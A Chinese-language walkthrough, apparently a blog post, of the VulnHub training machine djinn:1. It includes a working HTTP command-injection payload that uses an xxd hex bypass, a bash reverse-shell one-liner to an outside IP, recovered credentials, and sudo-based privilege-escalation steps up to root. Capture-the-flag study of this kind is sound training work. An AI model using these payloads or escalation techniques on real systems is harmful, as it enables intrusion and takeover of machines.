Hack djinn:1 : walkthrough【VulnHub靶场】渗透测试实战系列7

靶场地址:djinn: 1

靶场介绍:

  • Level: Beginner-Intermediate
  • flags: user.txt and root.txt
  • Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.
  • Format: Virtual Machine (Virtualbox - OVA)
  • Operating System: Linux

 虚拟机安装完成之后,界面如下

 

 扫描一下端口,开放了21,1337,7331端口

ftp端口支持匿名登录

 web端口看了一下,没什么普通漏洞

 

先去ftp上面看下有什么特别到东西

获取了一些信息,nitu:81299和用户名nitish,由于没有ssh端口,先放着

1337端口telnet一下,发现是个数学游戏

写了一个python的小程序

#!/usr/bin/python
# -*- coding: UTF-8 -*-
# 测试中文


import logging
import telnetlib
import time

class TelnetClient():
    def __init__(self,):
        self.tn = telnetlib.Telnet()

    def login_host(self,host_ip,host_port):
        try:
            self.tn.open(host_ip,port=host_port)
        except:
            logging.warning('%s网络连接失败'%host_ip)
            return False

        loop = 0
        while loop < 1010:
            loop = loop + 1
            time.sleep(0.1)
            command_result = self.tn.read_very_eager().decode('ascii')
            print(command_result)
            #q = get_str_btw(command_result, "(", ")")
            start = command_result.rindex('(')+1
            end = command_result.rindex(')')
            q = command_result[start:end]
            print(q)
            arr = q.split(", ")
            a1 = int(arr[0])
            a2 = int(arr[2])
            print(int(arr[0]))
            print(arr[1])
            print(int(arr[2]))
            retval = ""
            if arr[1] == "'+'":
                retval = (str(a1+a2))
            if arr[1] == "'-'":
                retval = (str(a1-a2))
            if arr[1] == "'*'":
                retval = (str(a1*a2))
            if arr[1] == "'/'":
                if isinstance(a1/a2, int):
                    retval = (str(a1/a2))
                else:
                    retval = (str(a1)+"/"+str(a2))
            print(retval)
            self.tn.write(retval.encode('ascii') + b'\n')


if __name__ == '__main__':
    host_ip = '192.168.92.175'
    port = 1337

    telnet_client = TelnetClient()
    telnet_client.login_host(host_ip,port)

算出来的结果,大家可以自己去试试

继续看下7331的web端口

扫描一下文件和目录

只有两个页面,看了一下,wish页面是个shell执行,genie是展示结果的页面

用burp做了一下bypass,我这边采用的是xxd可以用,大家可以尝试一下其他的bypass

过滤了下面这些字符:. * / $ ?

POST /wish HTTP/1.1
Host: 192.168.31.166:7331
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.166:7331/wish
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Connection: close
Upgrade-Insecure-Requests: 1

cmd=echo "0x636174202f6574632f706173737764"|xxd -r -p|bash

测试了一下xxd执行没有问题,那就直接上反弹shell,bash -i >& /dev/tcp/192.168.31.198/1234 0>&1

执行完毕之后,meterpreter上得到反弹连接

由于之前不同的机器上测试,我这边换了地址,大家将就着看

查看一下/etc/passwd

 

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing+List+Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats+Bug-Reporting+System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd+Network+Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd+Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash
ftp:x:111:115:ftp+daemon,,,:/srv/ftp:/usr/sbin/nologin
nitish:x:1001:1001::/home/nitish:/bin/bash

发现两个用户sam和nitish

先看下提权的S位文件

发现nitish目录下面又一个可文件creds.txt

cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9

获得了用户名密码,因为没有ssh端口,所以我们su nitish提权

www-data@djinn:/opt/80$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@djinn:/opt/80$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9

nitish@djinn:/opt/80$ cd /home
cd /home
nitish@djinn:/home$ ls
ls
nitish  sam
nitish@djinn:/home$ cd nitish
cd nitish
nitish@djinn:~$ ls -l
ls -l
total 4
-rw-r----- 1 nitish nitish 33 Nov 12 17:29 user.txt
nitish@djinn:~$ cat user.txt
cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
nitish@djinn:~$ 

提权之后在用户目录获得user.txt文件,拿到第一个flag

根据之前S位发现的一个特殊文件/usr/bin/genie,这个文件可以直接执行

sudo -u sam genie -cmd whoami

提升到sam用户,sudo -l 一下看看有什么发现

sam@djinn:/home/sam$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sam may run the following commands on djinn:
    (root) NOPASSWD: /root/lago
sam@djinn:/home/sam$ sudo -u root /root/lago 

 有个程序可以执行lago

sudo -u root /root/lago 
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:

是个小程序,没有什么特别的东西发现

接着在sam用户下找一下文件

发现一个.pyc文件 ,拉下来做下反编译

#!/usr/bin/env python
# encoding: utf-8

from getpass import getuser
from os import system
from random import randint

def naughtyboi():
    print 'Working on it!! '


def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'


def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)


def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'

if __name__ == '__main__':
    main(options())
from getpass import getuser
from os import system
from random import randint

def naughtyboi():
    print 'Working on it!! '


def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'


def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)


def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'

if __name__ == '__main__':
    main(options())

根据程序分析,可以发现有获得bash的地方

sudo -u root /root/lago 
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100: 
Enter your number: num
num
# id
id
uid=0(root) gid=0(root) groups=0(root)
# ls -la /root/
ls -la /root/
total 64
drwx------  5 root root  4096 Nov 18 13:06 .
drwxr-xr-x 23 root root  4096 Nov 11 18:50 ..
-rw-------  1 root root 23351 Nov 18 13:06 .bash_history
-rw-r--r--  1 root root  3106 Apr  9  2018 .bashrc
drwx------  3 root root  4096 Oct 21 19:40 .cache
drwx------  3 root root  4096 Oct 21 19:40 .gnupg
-rwxr-xr-x  1 root root  1827 Nov 14 20:57 lago
drwxr-xr-x  3 root root  4096 Oct 20 23:50 .local
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-rwxr-xr-x  1 root root   457 Nov 12 21:24 proof.sh
# sh /root/proof.sh
sh /root/proof.sh
'unknown': I need something more specific.
    _                        _             _ _ _ 
   / \   _ __ ___   __ _ ___(_)_ __   __ _| | | |
  / _ \ | '_ ` _ \ / _` |_  / | '_ \ / _` | | | |
 / ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/   \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
                                     |___/       
djinn pwned...
__________________________________________________________________________

Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /home/sam
Date: Fri Dec 13 20:32:01 IST 2019
Whoami: root
__________________________________________________________________________

By @0xmzfr

Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)

# 

提权到root,然后执行sh proof.sh 获得第二个flag。大功告成!

 

总结

1、在ftp和1337端口花了很长时间,最后发现获得到信息都是迷雾蛋

2、shell bypass这里学到了不少东西

 

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值